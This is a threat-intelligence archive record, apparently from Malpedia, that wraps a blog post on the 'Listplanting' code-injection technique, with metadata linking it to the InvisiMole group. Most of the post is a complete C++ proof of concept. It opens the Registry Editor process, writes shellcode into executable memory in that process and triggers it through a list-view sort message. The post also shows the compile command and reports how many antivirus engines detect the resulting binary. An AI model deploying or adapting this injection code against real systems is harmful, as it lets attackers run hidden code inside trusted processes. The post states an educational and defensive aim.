{
	"id": "64b4f928-a5ea-4e43-8483-bf1d3af7f418",
	"created_at": "2026-04-06T00:11:42.794898Z",
	"updated_at": "2026-04-10T03:25:50.546404Z",
	"deleted_at": null,
	"sha1_hash": "588ed4a043b23a6df69e00cef073fdcc86b620b5",
	"title": "Malware development tricks: part 24. Listplanting. C++ example.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1748882,
	"plain_text": "Malware development tricks: part 24. Listplanting. C++ example.\r\nBy cocomelonc\r\nPublished: 2022-11-27 · Archived: 2026-04-05 23:00:39 UTC\r\n2 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis post is the result of my own research into the malware dev trick: Listplanting.\r\nUsing the LVM_SORTGROUPS , LVM_INSERTGROUPSORTED , and LVM_SORTITEMS messages, a ListView control’s items\r\nand groups can have their sorting behavior modified to suit individual preferences. List-view controls are user\r\ninterface windows that display groups of things. A SysListView32 control stores information about an application’s\r\nlist-view settings in the process’ memory.\r\nListPlanting may be performed by copying code into the virtual address space of a process that uses a list-view control\r\nthen using that code as a custom callback for sorting the listed items.\r\npractical examplePermalink\r\nLet’s go to look at a practical example. The trick is pretty simple:\r\nhttps://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html\r\nPage 1 of 10\n\nFirst of all, get windows handle:\r\nHWND wpw = FindWindow(NULL, (LPCSTR)\"Registry Editor\");\r\nHWND hw = FindWindowEx(wpw, 0, (LPCSTR)\"SysListView32\", 0);\r\nThen, get process ID, and open it (get process handle by OpenProcess ):\r\nGetWindowThreadProcessId(hw, \u0026pid);\r\nph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);\r\nAt the next step, we allocate RWX-memory via VirtualAllocEx and “copy” payload:\r\nmem = VirtualAllocEx(ph, NULL, sizeof(my_payload), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n// copy payload\r\nWriteProcessMemory(ph, mem, my_payload, sizeof(my_payload), NULL);\r\nFinally, trigger payload:\r\n// trigger payload\r\nPostMessage(hw, LVM_SORTITEMS, 0, (LPARAM)mem);\r\nAccording to documentation, PostMessage - Places (posts) a message in the message queue associated with the\r\nthread that created the specified window and returns without waiting for the thread to process the message.\r\nThe full source code of my PoC:\r\n/*\r\nhack.cpp\r\ncode injection Listplanting\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003ccommctrl.h\u003e\r\n#include \u003ciostream\u003e\r\n#pragma comment (lib, \"user32.lib\")\r\nunsigned char my_payload[] =\r\n // 64-bit meow-meow messagebox\r\n \"\\xfc\\x48\\x81\\xe4\\xf0\\xff\\xff\\xff\\xe8\\xd0\\x00\\x00\\x00\\x41\"\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\"\r\n \"\\x3e\\x48\\x8b\\x52\\x18\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x48\\x8b\\x72\"\r\n \"\\x50\\x3e\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\"\r\n \"\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\"\r\nhttps://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html\r\nPage 2 of 10\n\n\"\\xed\\x52\\x41\\x51\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x8b\\x42\\x3c\\x48\"\r\n \"\\x01\\xd0\\x3e\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x6f\"\r\n \"\\x48\\x01\\xd0\\x50\\x3e\\x8b\\x48\\x18\\x3e\\x44\\x8b\\x40\\x20\\x49\"\r\n \"\\x01\\xd0\\xe3\\x5c\\x48\\xff\\xc9\\x3e\\x41\\x8b\\x34\\x88\\x48\\x01\"\r\n \"\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\"\r\n \"\\xc1\\x38\\xe0\\x75\\xf1\\x3e\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\"\r\n \"\\x75\\xd6\\x58\\x3e\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x3e\\x41\"\r\n \"\\x8b\\x0c\\x48\\x3e\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x3e\\x41\\x8b\"\r\n \"\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\"\r\n \"\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\"\r\n \"\\x59\\x5a\\x3e\\x48\\x8b\\x12\\xe9\\x49\\xff\\xff\\xff\\x5d\\x49\\xc7\"\r\n \"\\xc1\\x00\\x00\\x00\\x00\\x3e\\x48\\x8d\\x95\\x1a\\x01\\x00\\x00\\x3e\"\r\n \"\\x4c\\x8d\\x85\\x25\\x01\\x00\\x00\\x48\\x31\\xc9\\x41\\xba\\x45\\x83\"\r\n \"\\x56\\x07\\xff\\xd5\\xbb\\xe0\\x1d\\x2a\\x0a\\x41\\xba\\xa6\\x95\\xbd\"\r\n \"\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\n \"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\"\r\n \"\\xd5\\x4d\\x65\\x6f\\x77\\x2d\\x6d\\x65\\x6f\\x77\\x21\\x00\\x3d\\x5e\"\r\n \"\\x2e\\x2e\\x5e\\x3d\\x00\";\r\nint main(int argc, char* argv[]) {\r\n HANDLE ph;\r\n DWORD pid;\r\n LPVOID mem;\r\n // find window\r\n HWND wpw = FindWindow(NULL, (LPCSTR)\"Registry Editor\");\r\n HWND hw = FindWindowEx(wpw, 0, (LPCSTR)\"SysListView32\", 0);\r\n // obtain the process id and try to open process\r\n GetWindowThreadProcessId(hw, \u0026pid);\r\n ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);\r\n // allocate RWX memory\r\n mem = VirtualAllocEx(ph, NULL, sizeof(my_payload), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n // copy payload\r\n WriteProcessMemory(ph, mem, my_payload, sizeof(my_payload), NULL);\r\n // trigger payload\r\n PostMessage(hw, LVM_SORTITEMS, 0, (LPARAM)mem);\r\n // free memory\r\n VirtualFreeEx(ph, mem, 0, MEM_DECOMMIT | MEM_RELEASE);\r\n CloseHandle(ph);\r\n return 0;\r\n}\r\nhttps://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html\r\nPage 3 of 10\n\nAs you can see, as usually, for simplicity I used meow-meow messagebox payload:\r\nunsigned char my_payload[] =\r\n // 64-bit meow-meow messagebox\r\n \"\\xfc\\x48\\x81\\xe4\\xf0\\xff\\xff\\xff\\xe8\\xd0\\x00\\x00\\x00\\x41\"\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\"\r\n \"\\x3e\\x48\\x8b\\x52\\x18\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x48\\x8b\\x72\"\r\n \"\\x50\\x3e\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\"\r\n \"\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\"\r\n \"\\xed\\x52\\x41\\x51\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x8b\\x42\\x3c\\x48\"\r\n \"\\x01\\xd0\\x3e\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x6f\"\r\n \"\\x48\\x01\\xd0\\x50\\x3e\\x8b\\x48\\x18\\x3e\\x44\\x8b\\x40\\x20\\x49\"\r\n \"\\x01\\xd0\\xe3\\x5c\\x48\\xff\\xc9\\x3e\\x41\\x8b\\x34\\x88\\x48\\x01\"\r\n \"\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\"\r\n \"\\xc1\\x38\\xe0\\x75\\xf1\\x3e\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\"\r\n \"\\x75\\xd6\\x58\\x3e\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x3e\\x41\"\r\n \"\\x8b\\x0c\\x48\\x3e\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x3e\\x41\\x8b\"\r\n \"\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\"\r\n \"\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\"\r\n \"\\x59\\x5a\\x3e\\x48\\x8b\\x12\\xe9\\x49\\xff\\xff\\xff\\x5d\\x49\\xc7\"\r\n \"\\xc1\\x00\\x00\\x00\\x00\\x3e\\x48\\x8d\\x95\\x1a\\x01\\x00\\x00\\x3e\"\r\n \"\\x4c\\x8d\\x85\\x25\\x01\\x00\\x00\\x48\\x31\\xc9\\x41\\xba\\x45\\x83\"\r\n \"\\x56\\x07\\xff\\xd5\\xbb\\xe0\\x1d\\x2a\\x0a\\x41\\xba\\xa6\\x95\\xbd\"\r\n \"\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\n \"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\"\r\n \"\\xd5\\x4d\\x65\\x6f\\x77\\x2d\\x6d\\x65\\x6f\\x77\\x21\\x00\\x3d\\x5e\"\r\n \"\\x2e\\x2e\\x5e\\x3d\\x00\";\r\ndemoPermalink\r\nLet’s go to see everything in action. Compile our “malware”:\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-secti\r\nThen, run Registry Editor in the victim machine ( Windows 10 x64 in my case):\r\nhttps://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html\r\nPage 4 of 10\n\nAnd, run our hack.exe :\r\n.\\hack.exe\r\nhttps://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html\r\nPage 5 of 10\n\nhttps://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html\r\nPage 6 of 10\n\nRun as Administrator, because for injecting to Registry Editor ( regedit.exe ) requires elevated privileges.\r\nFor correctness, run Process Hacker 2 as Administrator and check memory tab:\r\nhttps://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html\r\nPage 7 of 10\n\nhttps://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html\r\nPage 8 of 10\n\nAs you can see, everything is work perfectly :)\r\nLet’s go to upload hack.exe to VirusTotal:\r\nSo, 19 of 71 AV engines detect our file as malicious.\r\nhttps://www.virustotal.com/gui/file/a1037630f95f721c6a7a1b6d8c278b4e926253b3888ac838d507af8c8baf8844/detection\r\nThis technique is used in InvisiMole. InvisiMole is a modular spyware software that the InvisiMole Group has been\r\nusing since at least 2013.\r\nhttps://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html\r\nPage 9 of 10\n\nI hope this post spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red\r\nteamers arsenal.\r\nATT\u0026CK MITRE: ListPlanting\r\nInvisiMole\r\nPostMessage\r\nsource code in github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html\r\nhttps://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html"
	],
	"report_names": [
		"malware-tricks-24.html"
	],
	"threat_actors": [
		{
			"id": "11f52079-26d3-4e06-8665-6a0b3efdc41c",
			"created_at": "2022-10-25T16:07:23.736987Z",
			"updated_at": "2026-04-10T02:00:04.732021Z",
			"deleted_at": null,
			"main_name": "InvisiMole",
			"aliases": [
				"UAC-0035"
			],
			"source_name": "ETDA:InvisiMole",
			"tools": [
				"InvisiMole"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "12b5d602-4017-4a6f-a2a3-387a6e07a27b",
			"created_at": "2023-01-06T13:46:39.095233Z",
			"updated_at": "2026-04-10T02:00:03.21157Z",
			"deleted_at": null,
			"main_name": "InvisiMole",
			"aliases": [],
			"source_name": "MISPGALAXY:InvisiMole",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434302,
	"ts_updated_at": 1775791550,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/588ed4a043b23a6df69e00cef073fdcc86b620b5.pdf",
		"text": "https://archive.orkl.eu/588ed4a043b23a6df69e00cef073fdcc86b620b5.txt",
		"img": "https://archive.orkl.eu/588ed4a043b23a6df69e00cef073fdcc86b620b5.jpg"
	}
}